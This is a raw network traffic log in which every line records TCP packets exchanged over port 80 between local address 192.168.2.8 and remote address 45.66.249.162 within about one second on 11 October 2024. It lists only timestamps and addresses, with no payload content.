                                                                                                                                                              Oct 11, 2024 22:32:38.919348955 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.919364929 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.919373989 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.919390917 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.919408083 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.919425011 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.919454098 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.919455051 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.919476032 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.919485092 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.919495106 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.919502020 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.919518948 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.919523001 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.919543028 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.919553041 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.919572115 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.919572115 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.919593096 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.919604063 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.919614077 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.919621944 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.919634104 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.919640064 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.919653893 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.919657946 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.919672012 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.919687033 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.919694901 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.919698000 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.919728041 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.919985056 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.920023918 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.920056105 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.920074940 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.920083046 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.920094967 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.920099020 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.920121908 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.920128107 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.920142889 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.920155048 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.920164108 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.920170069 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.920200109 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.920511961 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.920527935 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.920550108 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.920555115 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.920574903 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.920574903 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.920587063 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.920603991 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.920607090 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.920622110 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.920639992 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.920644999 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.920650005 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.920665026 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.920674086 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.920692921 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.920697927 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.920717001 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.920728922 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.920733929 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.920751095 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.920762062 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.920764923 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.920784950 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.920795918 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.920804977 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.920824051 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.920826912 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.920838118 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.920846939 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.920865059 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.920866013 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.920883894 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.920888901 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.920896053 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.920908928 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.920926094 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.920927048 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.920944929 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.920948029 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.920955896 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.920968056 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.920974970 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.920989037 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.920996904 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.921008110 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.921017885 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.921027899 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.921036959 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.921047926 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.921056032 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.921066999 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.921078920 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.921087027 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.921094894 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.921108007 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.921113014 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.921128988 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.921134949 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.921155930 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.921199083 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.921216965 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.921233892 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.921236038 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.921241999 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.921263933 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.921266079 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.921283960 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.921293020 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.921303988 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.921310902 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.921330929 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.921335936 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.921351910 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.921359062 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.921371937 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.921377897 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.921391010 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.921400070 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.921416998 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.921418905 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.921437979 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.921451092 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.921453953 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.921471119 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.921475887 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.921483040 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.921497107 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.921499014 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.921525002 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.921525002 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.921550989 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.921552896 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.921571016 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.921581030 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.921591043 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.921597004 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.921617985 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.921618938 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.921638012 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.921648979 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.921658993 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.921665907 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.921679974 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.921684027 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.921700001 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.921710014 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.921729088 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.921756029 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.921772957 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.921789885 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.921792984 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.921802044 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.921813011 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.921830893 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.921839952 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.921850920 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.921860933 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.921869993 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.921880960 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.921886921 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.921901941 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.921907902 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.921922922 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.921930075 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.921948910 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.922013998 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.922030926 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.922048092 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.922049046 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.922055960 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.922076941 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.922077894 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.922096968 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.922111988 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.922120094 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.922123909 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.922142029 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.922156096 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.922164917 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.922168016 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.922185898 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.922198057 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.922204971 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.922216892 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.922224998 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.922225952 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.922246933 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.922255993 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.922269106 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.922274113 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.922292948 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.922307968 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.922327042 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.922339916 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.922348022 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.922350883 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.922379017 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.922594070 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.922625065 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.922632933 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.922651052 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.922663927 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.922676086 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.922761917 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.922781944 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.922797918 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.922808886 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.070025921 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.070099115 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.070147038 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.070180893 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.070210934 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.070216894 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.070264101 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.070270061 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.070286989 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.070300102 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.070316076 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.070336103 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.070337057 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.070370913 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.070373058 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.070405960 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.070420980 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.070455074 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.070456982 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.070491076 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.070491076 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.070518017 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.070527077 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.070538998 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.070550919 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.070564032 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.070574999 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.070595026 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.070611000 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.070616007 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.070631027 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.070641994 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.070645094 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.070660114 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.070681095 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.070691109 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.070708990 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.070712090 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.070720911 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.070734978 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.070743084 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.070758104 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.070775986 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.070779085 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.070792913 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.070805073 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.070806980 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.070825100 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.070841074 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.070849895 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.070862055 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.070868969 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.070879936 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.070890903 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.070895910 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.070910931 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.070930004 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.070930958 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.070945978 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.070957899 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.070965052 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.070979118 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.070983887 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.070997953 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.071013927 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.071022987 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.071027040 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.071049929 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.071054935 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.071072102 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.071078062 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.071091890 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.071101904 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.071115017 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.071125031 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.071135998 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.071144104 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.071156979 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.071166992 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.071177959 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.071190119 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.071202040 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.071207047 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.071227074 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.071240902 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.071254015 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.071257114 CEST4970780192.168.2.845.66.249.162
